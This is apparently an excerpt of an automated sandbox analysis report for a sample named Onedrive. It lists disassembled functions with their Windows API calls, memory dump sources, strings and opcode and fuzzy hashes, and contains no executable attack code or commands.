                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: CharCompareNextString
                                        • String ID: ParentWindowHandle
                                        • API String ID: 42738925-3107191162
                                        • Opcode ID: 9b5e5f58ba1c0355205f2e51d40cdeab6236930dcbe1988ed698acfeb2a85902
                                        • Instruction ID: 78a379569cd7570f8968037b89568d0938fb7bd7cdcc779b1f8b926c9480b808
                                        • Opcode Fuzzy Hash: 9b5e5f58ba1c0355205f2e51d40cdeab6236930dcbe1988ed698acfeb2a85902
                                        • Instruction Fuzzy Hash: 6911AE72A08F41D2EA109B19E480469BBA8FB85FE0F094231DA9DC73B4CF78E452C780
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: _handle_error
                                        • String ID: !
                                        • API String ID: 1757819995-2657877971
                                        • Opcode ID: 31259513605473294c34c3e7b0e08d07127f97ca892bbed1284fd23ba27d28bd
                                        • Instruction ID: 283c2246af4fbea83754a7757a13ac7446cbdb07e1688672fd8c089f3be3bb6d
                                        • Opcode Fuzzy Hash: 31259513605473294c34c3e7b0e08d07127f97ca892bbed1284fd23ba27d28bd
                                        • Instruction Fuzzy Hash: 1921E676918FC68AD361CF20E49435BB761FBDA394F10531AE6C91AA59EFBDD0848F00
                                        APIs
                                          • Part of subcall function 00007FF6104FBF50: FindResourceExW.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FBF89
                                          • Part of subcall function 00007FF6104FBF50: LoadResource.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FBFA6
                                          • Part of subcall function 00007FF6104FBF50: LockResource.KERNEL32(?,?,?,00007FF6104FC0CB,?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FBFBA
                                        • CoTaskMemAlloc.API-MS-WIN-CORE-COM-L1-1-0(?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FC0DE
                                        • memmove.MSVCRT(?,?,00000000,00000000,ComplianceText,00007FF6104F671B), ref: 00007FF6104FC0FF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Resource$AllocFindLoadLockTaskmemmove
                                        • String ID: ComplianceText
                                        • API String ID: 2400272053-346262819
                                        • Opcode ID: d0e0c6b74d3b1db5bed1160ee6f8d77aa5f369837bbad029478e9a13ddd59461
                                        • Instruction ID: 7fe7fb7bb0031c15d6cbbfd21823dc751030ec24e12a41626075e9c869ccec76
                                        • Opcode Fuzzy Hash: d0e0c6b74d3b1db5bed1160ee6f8d77aa5f369837bbad029478e9a13ddd59461
                                        • Instruction Fuzzy Hash: 17018E32704F5AD5EB008F16E54446977A8FB48FE0B554135EF9C83311EE79D865C744
                                        APIs
                                        • __vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031CC0B
                                          • Part of subcall function 00007FF8A0326620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF8A0318375,?,?,?,?,00007FF8A0318062), ref: 00007FF8A0326641
                                          • Part of subcall function 00007FF8A031A8F0: _CrtIsValidPointer.LIBCMTD ref: 00007FF8A031AA28
                                        • __vcrt_lock.LIBVCRUNTIMED ref: 00007FF8A031CC1E
                                          • Part of subcall function 00007FF8A03266B0: LeaveCriticalSection.KERNEL32 ref: 00007FF8A03266D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: CriticalSection__vcrt_lock$EnterLeavePointerValid
                                        • String ID: Object dump complete.
                                        • API String ID: 214106405-632625063
                                        • Opcode ID: 4cfabe9e16e217f67a37880c542c18e4384e5ef92c90be165fa344c828315f3d
                                        • Instruction ID: 8caaf46b68c436cd146e128a71fb70281fa1437d890058b0e81e1ce6edf0fb57
                                        • Opcode Fuzzy Hash: 4cfabe9e16e217f67a37880c542c18e4384e5ef92c90be165fa344c828315f3d
                                        • Instruction Fuzzy Hash: 82E0E531E2AF4361EB24AB30B45246A3695EF98390F500939EA4D42B66CE3ED4518600
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocFree
                                        • String ID:
                                        • API String ID: 756756679-0
                                        • Opcode ID: ec3ed53e830ef29eaed5c7455dc5402a09fcb77eb0c15c34ebd509174ddb0a9b
                                        • Instruction ID: 838906c170cc9de8eabca09d8d9223b46244f058ad2f1c78843fc547d3fd147f
                                        • Opcode Fuzzy Hash: ec3ed53e830ef29eaed5c7455dc5402a09fcb77eb0c15c34ebd509174ddb0a9b
                                        • Instruction Fuzzy Hash: 2441F832A09E46E2EE146F19548807DB69AAF85FA0B5A8434DF0E97391DF3DF4258384
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocFree
                                        • String ID:
                                        • API String ID: 756756679-0
                                        • Opcode ID: a3998bc3de551fcda7df379af246413ff6d61123959c3ffa7706a279462b92c5
                                        • Instruction ID: d423fc7b534d3224f0798177f44ba8c3d430a7f2117463b4102a9bcf66a26324
                                        • Opcode Fuzzy Hash: a3998bc3de551fcda7df379af246413ff6d61123959c3ffa7706a279462b92c5
                                        • Instruction Fuzzy Hash: B031C836A08E46E3EF14BB19648407DB696BF88FA4F194034DA0EC7765EE3DE4658780
                                        APIs
                                        • GetProcessHeap.KERNEL32(?,0000002C,00000000,00007FF6104FD792,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104F3D22
                                        • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104F3D36
                                        • GetProcessHeap.KERNEL32(?,0000002C,00000000,00007FF6104FD792,?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104F3D60
                                        • HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF6104FD0EA,?,?,00000000), ref: 00007FF6104F3D74
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: 638836722cf7048d1bf94783388415340188a83ebd2bdcbcea777a97fdbb2424
                                        • Instruction ID: 2b06e9d76924670d382425c823c2dba6ed202f8f7cec8666649e55c2065094e2
                                        • Opcode Fuzzy Hash: 638836722cf7048d1bf94783388415340188a83ebd2bdcbcea777a97fdbb2424
                                        • Instruction Fuzzy Hash: AD21E372605F80DAD704DF56E94052AFBA4FB49F95B58C028DE5D83728DF38E8A6C700
                                        APIs
                                        • GetProcessHeap.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9425
                                        • HeapFree.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9439
                                        • GetProcessHeap.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9460
                                        • HeapFree.KERNEL32(?,?,?,00007FF6104F8E62,?,?,00000000,00007FF6104F8CA3), ref: 00007FF6104F9474
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: 3e86e4dcd2535bc755a9fed3a9300e9a714d08f464ff0702280dd5afbf24254d
                                        • Instruction ID: 95e427c6ce3fe14a4ffedd192fd920a50815a5b4c21e1334fc86870e26d0ea88
                                        • Opcode Fuzzy Hash: 3e86e4dcd2535bc755a9fed3a9300e9a714d08f464ff0702280dd5afbf24254d
                                        • Instruction Fuzzy Hash: 3A112732A09A81D6EB019F66E540329BBA0FB89F99F09C138DA1D87758CF39D856C740
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: 370ec17ccc83911cd007076dc0f9eb91e4386e1627f728e9e5818a12ee81812d
                                        • Instruction ID: e08868759b2c29273abe999d8a9c712917a8530544a8d588a581a8e314771e14
                                        • Opcode Fuzzy Hash: 370ec17ccc83911cd007076dc0f9eb91e4386e1627f728e9e5818a12ee81812d
                                        • Instruction Fuzzy Hash: 39016D32A08F41DAEB04AF56A4442A9BBA4FB89F94F488034EA4D83719DF3CD554C700
                                        APIs
                                        • GetProcessHeap.KERNEL32(?,?,?,00007FF6104FDE5C,?,?,00000000,00007FF6104FC831), ref: 00007FF6104FE226
                                        • HeapFree.KERNEL32(?,?,?,00007FF6104FDE5C,?,?,00000000,00007FF6104FC831), ref: 00007FF6104FE23B
                                        • GetProcessHeap.KERNEL32(?,?,?,00007FF6104FDE5C,?,?,00000000,00007FF6104FC831), ref: 00007FF6104FE25B
                                        • HeapFree.KERNEL32(?,?,?,00007FF6104FDE5C,?,?,00000000,00007FF6104FC831), ref: 00007FF6104FE270
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: 938d2cf42dbc51606c7f29f4e85f8ebc757b3eddb55ba9efdae9b313ca5ec6b8
                                        • Instruction ID: a45208b07dd7444db0280af3a62ca261281b186437bd1dc28ffbc9f4433fb3e4
                                        • Opcode Fuzzy Hash: 938d2cf42dbc51606c7f29f4e85f8ebc757b3eddb55ba9efdae9b313ca5ec6b8
                                        • Instruction Fuzzy Hash: 93011E32A04E82D6EF149B65E1543BDB7A4FF4DF99F49C035DA0A86359DF38D1658300